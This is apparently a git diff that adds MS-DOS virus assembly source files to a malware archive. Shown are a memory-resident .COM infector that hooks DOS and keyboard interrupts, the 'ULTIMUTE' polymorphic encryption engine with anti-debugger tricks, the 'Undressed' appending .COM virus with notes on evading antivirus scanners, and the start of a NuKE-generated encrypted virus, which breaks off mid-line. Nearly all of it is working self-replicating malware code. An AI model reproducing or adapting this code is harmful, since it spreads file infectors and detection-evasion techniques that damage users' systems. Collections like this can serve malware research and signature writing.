+VECTOR SEGMENT AT 0 + + ; Interrupt vectors + + ORG 58H +BW0058 DW ? ; Interrupt 16H offset +BW005A DW ? ; Interrupt 16H segment + ORG 80H +BW0080 DW ? ; Interrupt 20H offset +BW0082 DW ? ; Interrupt 20H segment +BW0084 DW ? ; Interrupt 21H offset +BW0086 DW ? ; Interrupt 21H segment + +VECTOR ENDS + +RAM SEGMENT AT 400H + + ; System data + + ORG 6CH +BW046C DW ? ; System clock + +RAM ENDS + +HOST SEGMENT AT 0 + + ORG 2CH +DW002C DW ? + ORG 0D0H +DW00D0 EQU THIS WORD +DB00D0 DB ? + ORG 100H +DB0100 DB ? +DW0101 DW ? + +HOST ENDS + +CODE SEGMENT BYTE PUBLIC 'CODE' + + ASSUME CS:CODE,DS:HOST + + DB 'V1' ; Signature + DB 0E9H, 1, 0 ; Jump for start of host + DB '*.COM', 0 ; File spec for infection + DB 0CEH, 0CDH, 20H ; File start read buffer + DB 'V1' ; Signature test read buffer + DW 5 ; File handle + DB 0CDH, 20H, 90H ; Start of host + DB 0 + DW 5AH ; Generation count + DB 0 + + ; Entry point + +START: PUSH BX + PUSH CX + PUSH DX + PUSH DS + PUSH ES + PUSH SI + PUSH CS + POP DS + CALL BP0024 ; \ Get current address +BP0024: POP SI ; / + SUB SI,24H ; Relocate from start of virus + DEC WORD PTR [SI+16H] ; Subtract from generation count + CMP WORD PTR [SI+16H],3 ; Is generation count three? + JNE BP0036 ; Branch if not + MOV WORD PTR [SI+16H],005BH ; Reset generation count to 91 +BP0036: CALL BP02BE ; Test system for infection + MOV DX,00D0H ; Temp default DTA + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service + MOV AL,[SI+0BH] ; \ Save start of host (1) + MOV [SI+12H],AL ; / + MOV AX,[SI+0CH] ; \ Save start of host (2) + MOV [SI+13H],AX ; / + MOV AH,2AH ; Get date function + INT 21H ; DOS service + TEST DL,1 ; First of month? + JNZ BP0074 ; Branch if not + MOV DX,SI ; \ Address '*.COM' + ADD DX,5 ; / + nop + XOR CX,CX ; No attributes + MOV AH,4EH ; Find first file function + INT 21H ; DOS service + JB BP0074 ; Branch if not found +BP0063: CALL BP0092 ; Test for infection + MOV DX,SI ; \ Address '*.COM' + ADD DX,5 ; / + nop + XOR CX,CX ; No attributes + MOV AH,4FH ; Find next file function + INT 21H ; DOS service + JNB BP0063 ; Branch if found +BP0074: MOV AL,[SI+12H] ; \ Restore start of host (1) + MOV DB0100,AL ; / + MOV AX,[SI+13H] ; \ Restore start of host (2) + MOV DW0101,AX ; / + MOV DX,0080H ; Original default DTA + MOV AH,1AH ; Set DTA function + INT 21H ; DOS service + POP SI + POP ES + POP DS + POP DX + POP CX + POP BX + MOV AX,0100H ; \ Branch to start of host + JMP AX ; / + + ; Test for infection in COM file + +BP0092: MOV AX,4301H ; Set file attributes function + MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA + XOR CX,CX ; No attributes + INT 21H ; DOS service + MOV AX,3D02H ; Open handle (R/W) function + MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA + INT 21H ; DOS service + JNB BP00A9 ; Branch if no error + JMP BP015D ; Return + +BP00A9: MOV [SI+10H],AX ; Save file handle + MOV BX,AX ; Move file handle + MOV AH,3FH ; Read handle function + MOV CX,3 ; Length to read + MOV DX,SI ; \ Address start-of-host store + ADD DX,000BH ; / + nop + INT 21H ; DOS service + CMP BYTE PTR [SI+0BH],0E9H ; Is it a jump? + JNE BP00F1 ; Branch if not + MOV DX,[SI+0CH] ; \ + SUB DX,16H ; / + XOR CX,CX ; No high offset + MOV AX,4200H ; Move file pointer function + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + MOV BX,AX ; Move actual offset (? not used) + MOV AH,3FH ; Read handle function + MOV CX,2 ; Length to read + MOV DX,SI ; \ Address signature test buffer + ADD DX,000EH ; / + nop + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + JB BP014A ; Branch if error + CMP AX,0 ; Did we read anything? + JE BP00F1 ; Branch if not + MOV AX,[SI+0EH] ; Get signature test + CMP AX,[SI] ; Is it signature? + JE BP014A ; Branch if yes +BP00F1: XOR CX,CX ; \ No offset + XOR DX,DX ; / + MOV AX,4202H ; Move file pointer function (EOF) + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + JB BP014A ; Branch if error + SUB AX,3 ; Convert length to jump offset + MOV [SI+3],AX ; Store in jump + MOV BX,[SI+10H] ; Get file handle + MOV AH,40H ; Write handle function + MOV CX,OFFSET ENDADR ; Length of virus + NOP + MOV DX,SI ; \ Address start of virus + ADD DX,0 ; / + nop + INT 21H ; DOS service + JB BP014A ; Branch if error + ADD WORD PTR [SI+3],19H ; Add entry point offset to jump offset + XOR DX,DX ; \ No offset + XOR CX,CX ; / + MOV AX,4200H ; Move file pointer function + MOV BX,[SI+10H] ; Get file handle + INT 21H ; DOS service + JB BP014A ; Branch if error + MOV BX,[SI+10H] ; Get file handle + MOV AH,40H ; Write handle function + MOV CX,3 ; Length of jump + MOV DX,SI ; \ Address initial jump + ADD DX,2 ; / + nop + INT 21H ; DOS service + MOV AX,5701H ; Set file date & time function + MOV BX,[SI+10H] ; Get file handle + MOV CX,DW00D0+16H ; Get file time from DTA + MOV DX,DW00D0+18H ; Get file date from DTA + INT 21H ; DOS service +BP014A: MOV BX,[SI+10H] ; Get file handle + MOV AH,3EH ; Close handle function + INT 21H ; DOS service + MOV AX,4301H ; Set file attributes function + MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA + MOV CL,DB00D0+15H ; Get attributes from DTA + INT 21H ; DOS service +BP015D: RET + + ; Interrupt 16H routine + +BP015E: STI + CMP AH,0DDH ; Infection test function? + JNE BP0167 ; Branch if not + MOV AL,AH ; Copy function number + IRET + +BP0167: CMP AH,0 ; Get key token? + JE BP01D8 ; Branch if yes + DB 0EAH ; Far jump +DW016D DW 0488H ; Int 16H offset +DW016F DW 39D8H ; Int 16H segment + +DW0171 DW 0FA76H +DW0173 DW 0F9DCH +DW0175 DW 005AH + +DB0177 DB 060H, 031H, 032H, 033H, 034H, 035H, 036H, 037H + DB 038H, 039H, 030H, 02DH, 03DH, 05CH, 07EH, 021H + DB 040H, 023H, 024H, 025H, 05EH, 026H, 02AH, 028H + DB 029H, 05FH, 02BH, 07CH, 071H, 077H, 065H, 072H + DB 074H, 079H, 075H, 069H, 06FH, 070H, 05BH, 05DH + DB 05BH, 061H, 073H, 064H, 066H, 067H, 068H, 06AH + DB 06BH, 06CH, 03BH, 027H, 07AH, 078H, 063H, 076H + DB 062H, 06EH, 06DH, 02CH, 02EH, 02FH, 051H, 057H + DB 045H, 052H, 054H, 059H, 055H, 049H, 04FH, 050H + DB 07BH, 07DH, 041H, 053H, 044H, 046H, 047H, 048H + DB 04AH, 04BH, 04CH, 03AH, 022H, 03BH, 05AH, 058H + DB 043H, 056H, 042H, 04EH, 04DH, 03CH, 03EH, 03FH + DB 02EH + +BP01D8: PUSH SI + CALL BP01DC ; \ Get current address +BP01DC: POP SI ; / + PUSHF + CALL DWORD PTR CS:[SI-6FH] ; Execute original BIOS call + PUSH BX + PUSH ES + MOV BX,0040H ; \ Address system RAM + MOV ES,BX ; / + ASSUME ES:RAM + MOV BX,BW046C ; Get system clock, low word + PUSH BX + SUB BX,CS:[SI-6BH] ; DW0171 + CMP BX,2 + POP BX + MOV CS:[SI-6BH],BX + JG BP0236 + XCHG BX,CS:[SI-69H] ; DW0173 + SUB BX,CS:[SI-69H] + NEG BX + CMP BX,CS:[SI-67H] ; DW0175 + JL BP0236 + DEC WORD PTR CS:[SI-67H] + CMP WORD PTR CS:[SI-67H],6 + JE BP021E + MOV WORD PTR CS:[SI-67H],005BH +BP021E: SUB SI,65H + PUSH CX + MOV CX,0061H +BP0225: CMP AL,CS:[SI] + JE BP0231 + INC SI + LOOP BP0225 + POP CX + JMP BP0236 + +BP0231: POP CX + MOV AL,CS:[SI+1] +BP0236: POP ES + POP BX + POP SI + RETF 2 + + ; Interrupt 21H routine + + ASSUME ES:NOTHING +BP023C: CMP AH,0 ; Terminate program? + JE BP0246 ; Branch if yes + CMP AH,4CH ; Load? + JNE BP025F ; Branch if not +BP0246: CALL BP026D ; Install virus in memory + MOV DX,CS:DW002C ; \ Set ES to environment block + MOV ES,DX ; / + MOV BX,0 ; Zero length + MOV AH,4AH ; Set block function + INT 21H ; DOS service + MOV DX,001DH ; \ Length to keep + ADD DX,1 ; / + MOV AH,31H ; Keep process function +BP025F: DB 0EAH ; Far jump +DW0260 DW 2DEAH ; Int 21H offset +DW0262 DW 4242H ; Int 21H segment + + ; Interrupt 20H routine + +BP0264: MOV AX,4C00H ; Fake a load + JMP BP023C ; Process as a DOS service + +DW0269 DW 2C08H ; Int 20H offset +DW026B DW 4242H ; Int 20H segment + + ; Install virus in memory + +BP026D: PUSH CX + PUSH DI + PUSH SI + PUSH ES + CALL BP0274 ; \ Get current address +BP0274: POP SI ; / + PUSH SI + MOV DI,0100H ; Address start of area + MOV CX,OFFSET BP023C-BP015E ; Length to copy +BP027C: MOV AL,CS:[SI+OFFSET BP015E-BP0274] ; Get a byte + MOV CS:[DI],AL ; Store in new location + INC SI ; Next input position + INC DI ; Next output position + LOOP BP027C ; Repeat to end of area + POP SI + XOR CX,CX ; \ Address zero + MOV ES,CX ; / + ASSUME ES:VECTOR + MOV CX,CS:[SI-14H] ; \ Restore Int 21H offset + MOV BW0084,CX ; / + MOV CX,CS:[SI-12H] ; \ Restore Int 21H segment + MOV BW0086,CX ; / + MOV CX,CS:[SI-0BH] ; \ Restore Int 20H offset + MOV BW0080,CX ; / + MOV CX,CS:[SI-9] ; \ Restore Int 20H segment + MOV BW0082,CX ; / + MOV CX,0100H ; \ Install moved area as Int 16H + MOV BW0058,CX ; / + ASSUME ES:NOTHING + POP ES + POP SI + POP DI + POP CX + RET + + ; Test system for infection + +BP02BE: PUSH AX + XOR AL,AL ; Clear register + MOV AH,0DDH ; Infection test function + INT 16H ; Keyboard I/O + CMP AL,AH ; Are they the same + JNE BP02CB ; Branch if not + POP AX + RET + + ; Install interrupts + +BP02CB: PUSH BX + PUSH SI + PUSH ES + MOV DX,[SI+16H] ; Get generation count + CALL BP02D4 ; \ Get current address +BP02D4: POP SI ; / + PUSH BX + PUSH ES + MOV BX,0040H ; \ Address system RAM + MOV ES,BX ; / + ASSUME ES:RAM + MOV BX,BW046C ; Get system clock, low word + MOV CS:[SI+DW0171-BP02D4],BX ; Get system clock, low word + MOV CS:[SI+DW0173-BP02D4],BX ; Get system clock, low word + ASSUME ES:NOTHING + POP ES + POP BX + MOV [SI+DW0175-BP02D4],DX ; Save generation count + XOR AX,AX ; \ Address zero + MOV ES,AX ; / + ASSUME ES:VECTOR + MOV AX,BW0084 ; \ Save Int 21H offset (DW0260) + MOV CS:[SI-74H],AX ; + MOV AX,BW0086 ; \ Save Int 21H segment (DW0262) + MOV CS:[SI-72H],AX ; + MOV AX,BW0058 ; \ Save Int 16H offset (DW016D) + MOV CS:[SI+0FE99H],AX ; / + MOV AX,BW005A ; \ Save Int 16H segment (DW016F) + MOV CS:[SI+0FE9BH],AX ; / + MOV AX,BW0080 ; \ Save Int 20H offset (DW0269) + MOV CS:[SI-6BH],AX ; / + MOV AX,BW0082 ; \ Save Int 20H segment (DW026B) + MOV CS:[SI-69H],AX ; / + CLI + PUSH CS ; \ Set Int 21H segment + POP BW0086 ; / + MOV BW0084,SI ; \ Set Int 21H offset (BP023C) + SUB BW0084,0098H ; / + PUSH CS ; \ Set Int 20H segment + POP BW0082 ; / + MOV BW0080,SI ; \ Set Int 20H offset (BP0264) + SUB BW0080,70H ; / + PUSH CS ; \ Set Int 16H segment + POP BW005A ; / + MOV BW0058,SI ; \ Set Int 16H offset (BP015E) + SUB BW0058,0176H ; / + STI + ASSUME ES:NOTHING + POP ES + POP SI + POP BX + POP AX + RET + +ENDADR EQU $ + +CODE ENDS + + END + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.ultimute.asm b/MSDOS/Virus.MSDOS.Unknown.ultimute.asm new file mode 100644 index 00000000..3fc488a5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ultimute.asm @@ -0,0 +1,584 @@ +; +; The ULTImate MUTation Engine .93 (c) 1993 Black Wolf Enterprises +; pardon the title, had to think of something... }-) +; +;ULTIMUTE is a mutation engine written for security-type applications and +;other areas where mutation of executable code is necessary. For my personal +;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s, +;using it to encrypt the code placed onto EXE's and COM's to protect them +;from simple modification and/or unauthorized use. The encryption algorithms +;themselves are terribly simple - the main point being that they change +;each time and are difficult to trace through. This engine is written mainly +;to keep a "hack one, hack 'em all" approach from working on protected code, +;rather than to keep the code secure by a cryptologist's point of view. +; +;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling +; code, largely variable size for decoder. Also includes variable +; calling segmentation (i.e. CS<>ES<>DS, and can be called via +; near call, far call, or interrupt, the last of which can be +; useful as a memory-resident handler for multiple programs to +; use). +; +;Note: Please - this program and it's source have been released as freeware, +; but do NOT use the mutation engine in viruses! For one thing, the +; decryptor sequence has several repetitive sequences that can be scanned +; for, and for another, that just isn't what it was designed for and +; I would NOT appreciate it. If you MUST use someone else's mutation +; engine for such, use the TPE or MTE. I do NOT condone such, however. +; +;Any modifications made to this program should be listed below the solid line, +;along with the name of the programmer and the date the file was changed. +;Also - they should be commented where changed. If at all possible, report +;modifications to file to the address listed in the documentation. +; +;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages +;resulting from the use/misuse of this program. The user agrees to hold +;the author harmless for any consequences that may occur directly or +;indirectly from the use of this program by utilizing this program/file +;in any manner. Please use the engine with care. +; +;Modifications: +; None as of yet (original release version) + +.model tiny +.radix 16 +.code + + public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand + +;Underscores are used so that these routines can be called from C and other +;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you +;need to add underscores in their names as well. Also, the random number +;generations may not be sound for all purposes. They do the job for this +;program, but they may/may not be mathematically correct. + +; +;ENTRY: +; CX=Code Length BX=New_Entry_Point +; DS:SI=Code AX=Calling Style +; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call +; +;RETURN: +; CX=New Size ES:DI = Same, now contains encrypted code +; w/decryptor +; +_ULTMUTE: + push bp ax bx cx dx es ds si di + call Get_Our_Offset + Offset_Mark: + inc cx + inc cx + mov word ptr cs:[bp+1+Set_Size],cx + mov word ptr cs:[Start_Pos+bp],bx + call Init_Rand + call Get_Base_Reg + call Setup_Choices + call Create_EncDec + call Copy_Decrypt_Code + call Encrypt_It +Ending_ULTMUTE: + pop di si ds es dx cx bx ax + add cx,cs:[Decryptor_Length+bp] + inc cx + inc cx + pop bp + cmp ax,3 ;Select Returning method, i.e. retn, retf, iret + je Int_Call + cmp ax,2 + je Far_Call +Near_Call: + retn +Far_Call: + retf +Int_Call: + iret +; +Get_Our_Offset: + mov bp,sp + mov bp,ss:[bp] ;This trick finds our current offset + sub bp,offset Offset_Mark ;from the compiling point, as it + ret ;is usually not constant.... +; +Init_Rand: + push ax ds + xor ax,ax + mov ds,ax + mov ax,ds:[46c] ;Get seed from timer click at + pop ds ;0000:046c + mov cs:[rand_seed+bp],ax + pop ax + ret +; +Get_Rand: + push cx dx + mov ax,cs:[rand_seed+bp] + mov cx,0deadh + mul cx ;This probably isn't a good algorithm, + xor ax,0dada ;(understatement) but it works for + ror ax,1 ;our purposes in this application. + mov cs:[rand_seed+bp],ax + pop dx cx + ret +; +rand_seed dw 0 +Base_Reg db 0 +Base_Pointer db 0 +Start_Pos dw 0 +; +Get_Base_Reg: + call Get_Rand + and ax,11b + cmp al,1 ;Eliminate CX for loop purposes + je Get_Base_Reg + mov byte ptr cs:[bp+Base_Reg],al + Do_Pointer_Reg: + call Get_Rand + shr al,1 + jc Done_Base_Reg + mov byte ptr cs:[bp+Base_Pointer],0 + ret + Done_Base_Reg: + mov byte ptr cs:[bp+Base_Pointer],1 + ret +; +Setup_Choices: + push ds si + push cs + pop ds + mov si,bp + + call Get_Rand + mov word ptr [si+Xor_It+2],ax ;Randomize Xor + call Get_Rand + mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub + mov word ptr [si+Dummy7+2],ax + + call Get_Rand ;Randomize Add/Sub + mov word ptr [si+Dummy4+2],ax + mov word ptr [si+Dummy8+2],ax + + call Get_Rand + mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes + mov byte ptr [si+Rand_Byte2],ah + call Get_Rand + mov byte ptr [si+Rand_Byte3],al + mov byte ptr [si+Rand_Byte4],ah + call Get_Rand + mov byte ptr [si+Rand_Byte5],al + mov byte ptr [si+Rand_Byte6],ah + call Get_Rand + mov byte ptr [si+Rand_Byte7],al + mov byte ptr [si+Rand_Byte8],ah + call Get_Rand + mov byte ptr [si+Rand_Byte9],al + mov byte ptr [si+Rand_Byte10],ah + + mov al,byte ptr [si+Base_Reg] + Set_Switcher: + and byte ptr [si+Switcher+1],0e6 ;Delete Register + mov ah,al + shl ah,1 + shl ah,1 + shl ah,1 + or byte ptr [Switcher+1+si],ah + Set_Switcher_Pointer: + push ax + mov al,byte ptr [si+Base_Pointer] + or byte ptr [si+Switcher+1],al + Set_Set_Pointy: + and byte ptr [si+Set_Pointy],0fe + or byte ptr [si+Set_Pointy],al + and byte ptr [si+Inc_Pointy],0fe + or byte ptr [si+Inc_Pointy],al + and byte ptr [si+Inc_Pointy+1],0fe + or byte ptr [si+Inc_Pointy+1],al + pop ax + Set_Xorit: + and byte ptr [si+Xor_It+1],0fc + or byte ptr [si+Xor_It+1],al + Set_Flip_It: + and byte ptr [si+Flip_It+1],0e4 + or byte ptr [si+Flip_It+1],al + or byte ptr [si+Flip_It+1],ah + Set_Rotate_It: + and byte ptr [si+do_rotate+1],0fc + or byte ptr [si+do_rotate+1],al + and byte ptr [si+do_rot2+1],0fc + or byte ptr [si+do_rot2+1],al + Set_IncDec: + and byte ptr [si+inc_bx_com],0fc + or byte ptr [si+inc_bx_com],al + and byte ptr [si+dec_bx_com],0fc + or byte ptr [si+dec_bx_com],al + + and byte ptr [si+Dummy5],0fc + or byte ptr [si+Dummy5],al + and byte ptr [si+Dummy6],0fc + or byte ptr [si+Dummy6],al + + Set_AddSub: + and byte ptr [si+Dummy3+1],0fc + and byte ptr [si+Dummy4+1],0fc + or byte ptr [si+Dummy3+1],al + or byte ptr [si+Dummy4+1],al + + and byte ptr [si+Dummy7+1],0fc + and byte ptr [si+Dummy8+1],0fc + or byte ptr [si+Dummy7+1],al + or byte ptr [si+Dummy8+1],al + pop si ds + ret +; +Create_EncDec: + push es di cx + push cs + pop es + lea di,[bp+Encrypt_Sequence] + call Get_Rand + and ax,1fh + shr ax,1 ;Insure odd number of encryptors to prevent + shl ax,1 ;things like "INC AX / DEC AX" to leave prog + inc ax ;unencrypted. + + mov byte ptr cs:[bp+Encrypt_Length],al + xchg cx,ax +Make_Pattern: + call Get_Rand + and ax,7 + stosb + loop Make_Pattern + pop cx di es + ret +; +Copy_Decrypt_Code: + push si di bx cx ds + push bx di ;save for loop + + push cs + pop ds + + lea si,[bp+Set_Pointy] + movsw + movsb + lodsb ;Copy initial encryptor + movsw + movsb + lodsb + movsw + + mov cl,byte ptr cs:[bp+Encrypt_Length] + xor ch,ch + lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier + Dec_Set_Loop: + push cx + lodsb + push si ;Create the Decryptor from Sequence + + mov bl,al + xor bh,bh + shl bx,1 + add bx,bp + add bx,offset Command_Table + mov ax,cs:[bx] + + mov cl,ah + xor ah,ah + + lea si,[Xor_It+bp] + add si,ax + repnz movsb + + pop si + pop cx + loop Dec_Set_Loop + + + lea si,[Switcher+bp] + movsw + lodsb ;Finish off Decryptor + movsw + lodsb + + movsw ;Loop Setup + movsw + + pop si bx + mov ax,di ;Set Loop + sub ax,si ;Do size of loop and offset from loop + + mov cs:[Decryptor_Length+bp],ax + + push ax ;Changed for Jump + not ax + add ax,5 + stosw + pop ax + + add bx,ax ;Set initial Pointer + mov es:[si+1],bx + + mov ax,di + pop ds cx bx di si + push si di bx cx +Copy_Prog: + push ax + sub ax,di + add ax,bx + mov word ptr es:[di+1],ax + pop ax + mov di,ax + repnz movsb + pop cx bx di si + ret +; +Encrypt_It: + push bx cx di si + + call set_seqp + + mov ax,cs:[Decryptor_Length+bp] + inc ax + inc ax + add di,ax ;DI=start of code to be encrypted + ;CX=Length of code to encrypt + mov si,di + push es + pop ds +Big_Enc_Loop: + push cx + call Switcher + mov cx,cs:[Encrypt_Length+bp] + + Encrypt_Value: + push ax bx cx dx si di + mov si,cs:[Save_SI+bp] + dec si + mov bl,cs:[si] ;?? + mov cs:[Save_SI+bp],si + lea si,cs:[Com_Table_2+bp] + xor bh,bh + shl bx,1 + add si,bx + mov bx,cs:[si] + add bx,bp + mov word ptr cs:[Next_Command+bp],bx + pop di si dx cx bx ax + call cs:[Next_Command+bp] + Loop Encrypt_Value + + pop cx + call Switcher + call Inc_Pointy + call set_seqp + loop Big_Enc_Loop + pop si di cx bx + ret + +Save_SI dw 0 +Next_Command dw 0 +set_seqp: + push si + lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence + add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence + mov cs:[Save_SI+bp],SI + pop si + ret +; +Command_Table: ;8 commands -> 3 bits. + db [Xor_It-Xor_It],(Flip_It-Xor_It-1) + db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1) + db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1) + db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1) + db [Dummy1-Xor_It],(Dummy2-Dummy1-1) + db [Dummy2-Xor_It],(Dummy3-Dummy2-1) + db [Dummy3-Xor_It],(Dummy4-Dummy3-1) + db [Dummy4-Xor_It],(Dummy5-Dummy4-1) +Com_Table_2: + dw [offset Xor_It] + dw [offset Flip_It] + dw [offset Rotate_It_2] + dw [offset Rotate_It_1] + dw [offset Dummy5] + dw [offset Dummy6] + dw [offset Dummy7] + dw [offset Dummy8] +; +Set_Pointy: + mov di,1234 ;Pointer to Code + ret +Set_Size: + mov cx,1234 ;Size + ret +Switcher: + xchg bx,[di] + ret +Inc_Pointy: + inc di + inc di + ret + +Loop_Mut: + dec cx + jz End_Loop_Mut + loop_set: + jmp _ULTMUTE + End_Loop_Mut: + ret +Xor_It: + xor bx,1234 + ret +Flip_It: + xchg bh,bl + ret + +Rotate_It_1: + jmp before_rot +do_rotate: + ror bx,1 + jmp after_rot +before_rot: + push ax + call Ports1 + pop ax + jmp do_rotate +Ports1: + in al,21 + or al,02 + out 21,al + ret + +Ports2: + in al,21 + xor al,02 + out 21,al + ret +after_rot: + push ax + call ports2 + pop ax + ret + +Rotate_It_2: + cli + jmp confuzzled1 +do_rot2: + rol bx,1 + call Switch_Int_1_3 + jmp donerot2 + +confuzzled1: + call Switch_Int_1_3 + jmp do_rot2 + +Switch_Int_1_3: + push ax ds + xor ax,ax + mov ds,ax + jmp short exch1 + db 0eah +exch1: + xchg ax,word ptr ds:[4] + jmp short exch2 + db 9ah +exch2: + xchg ax,word ptr ds:[0c] + xchg ax,word ptr ds:[4] + pop ds ax + ret +donerot2: + ret + +Dummy1: + jmp short inc_bx_com ;Kill Disassemblers + db 0ea + Rand_Byte1: + db 0ea + inc_bx_com: + inc bx + ret +Dummy2: + jmp short Kill_1 + Rand_Byte2: + db 0ea + Cont_Kill1: + cli + xchg ax,ds:[84] + xchg ax,ds:[84] + sti + pop ds ax + dec_bx_com: + dec bx + jmp short quit_Kill1 + Kill_1: + push ax ds + xor ax,ax + mov ds,ax ;Anti-Debugger (Kills Int 21) + jmp short Cont_Kill1 + Rand_Byte3: + db 0e8 + quit_Kill1: + ret +Dummy3: + add bx,1234 + push bx + call throw_debugger + Rand_Byte4: + db 0e8 ;Prefetch Trick + into_throw: + sub bx,offset Rand_Byte4 + add byte ptr [bx+trick_em+1],0ba + trick_em: + jmp short done_trick + Rand_Byte5: + db 0ea + throw_debugger: + pop bx + jmp short into_throw + Rand_Byte6: + db 0ea + done_trick: + sub byte ptr [bx+trick_em+1],0ba + pop bx + ret +Dummy4: + sub bx,1234 + jmp short Get_IRQ +Rand_Byte7 db 0e8 +Kill_IRQ: + out 21,al + xor al,2 + jmp short Restore_IRQ +Rand_Byte8 db 0e8 +Rand_Byte9 db 0e8 ;This will kill the keyboard + Get_IRQ: ;IRQ + push ax + in al,21 + xor al,2 + jmp short Kill_IRQ +Rand_Byte10 db 0e8 +Restore_IRQ: + out 21,al + pop ax + ret + +;The following are used for the encryption algorithm to reverse commands that +;include anti-tracing. +Dummy5: + dec bx + ret +Dummy6: + inc bx + ret +Dummy7: + sub bx,1234 + ret +Dummy8: + add bx,1234 + ret +; +Decryptor_Length dw 0 +Encrypt_Length dw 0 +Encrypt_Sequence db 30 dup(0) +; +_END_ULTMUTE: +end _ULTMUTE diff --git a/MSDOS/Virus.MSDOS.Unknown.undr.asm b/MSDOS/Virus.MSDOS.Unknown.undr.asm new file mode 100644 index 00000000..9dd8a5cb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.undr.asm @@ -0,0 +1,126 @@ +; Virus: The Undressed Virus +; Author: Arsonic[Codebreakers] +; Type: Appending +; Encryption: No +; +; Displays a Message on Feb 5th. +; Btw.. I Love Lisa..! +;--------------------------------------------------------------------------------------------------- +; AV-Product | Detected? | Comments +;--------------------------------------------------------------------------------------------------- +; F-Prot | No | Easy to Get Past.. FPROT SUCKS! +; TBAV | Unknown Virus | Well.. at least it aint say VCL! +; AVP | VCL.824 | VCL! ARRGGGHH! +;---------------------------------------------------------------------------------------------------- +db 0e9h,0,0 +start: +call delta +delta: +pop bp +sub bp,offset delta +mov cx,0ffffh ;kill heristics +fprot_loopy: +jmp back +mov ax,4c00h +int 21h +back: +loop fprot_loopy +mov cx,3 +nop +mov di,100h +nop +lea si,[bp+buffer] +nop +rep movsb +find_first: +mov ah,4ch +add ah,2 +nop +find_next: +nop +lea dx,[bp+filemask] +nop +int 21h +jnc infect +jmp check_payload +infect: +mov ax,3d02h +mov dx,9eh +int 21h +xchg ax,bx +mov ah,3dh +add ah,2 +mov cx,3 +lea dx,[bp+buffer] +int 21h +mov ax,word ptr[80h + 1ah] +nop +sub ax,end - start + 3 +nop +cmp ax,word ptr[bp+buffer+1] +nop +je close_file +mov ax,word ptr[80h + 1ah] +nop +sub ax,3 +nop +mov word ptr[bp+three+1],ax +mov ax,4200h +xor cx,cx +cwd +int 21h +mov ah,3eh +add ah,2 +nop +lea dx,[bp+three] +nop +mov cx,3 +nop +int 21h +mov ax,4202h +xor cx,cx +cwd +int 21h +mov ah,3eh +add ah,2 +nop +lea dx,[bp+start] +nop +mov cx,end - start +nop +int 21h +close_file: +mov ah,3ch +add ah,2 +int 21h +mov ah,4dh +add ah,2 +jmp find_next +check_payload: +mov ah,2ah +int 21h +cmp dh,2 ;is it febuary? +je next +jmp close +next: +cmp dl,5 ;the 5th? +je payload ;yes.. display the message +jmp close ;no.. return control to the program. +payload: +mov ah,9h ;display message +lea dx,[bp+message] +int 21h +int 00h ;get keypress +int 16h +int 20h ;return to dos. +close: +mov di,100h ;return control to program +jmp di +three db 0e9h,0,0 +filemask db '*.co*',0 ;if *.com it would be detected as trival variant +buffer db 0cdh,20h,0 +virus db 'The UnDreSSeD',0 ; messages to give those av'ers a +author db 'Arsonic[CB]',0 ; nice scan string.. +message db 'Happy Birthday Lisa!',10,13,'$' +Lisa db 'I LOVE U LISA!',0 +end: \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.unevie.asm b/MSDOS/Virus.MSDOS.Unknown.unevie.asm new file mode 100644 index 00000000..5087a461 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.unevie.asm @@ -0,0 +1,473 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +sub byte ptr [di],087h +inc word ptr [di] +xor byte ptr [di],022h +inc word ptr [di] +xor byte ptr [di],030h +add byte ptr [di],075h +xor byte ptr [di],061h +sub byte ptr [di],0b9h +xor word ptr [di],0e185h +add word ptr [di],0aa17h +not word ptr [di] +inc byte ptr [di] +inc word ptr [di] +xor word ptr [di],0c3d7h +sub word ptr [di],04a83h +not byte ptr [di] +xor word ptr [di],06acdh +inc di +inc di +;---------------------------------------------------------- +jmp bye ;######## BYE BYE F-PROT ! ########## +mov ah,4ch +int 21h +bye: ;#### HEY FRIDRIK! IS 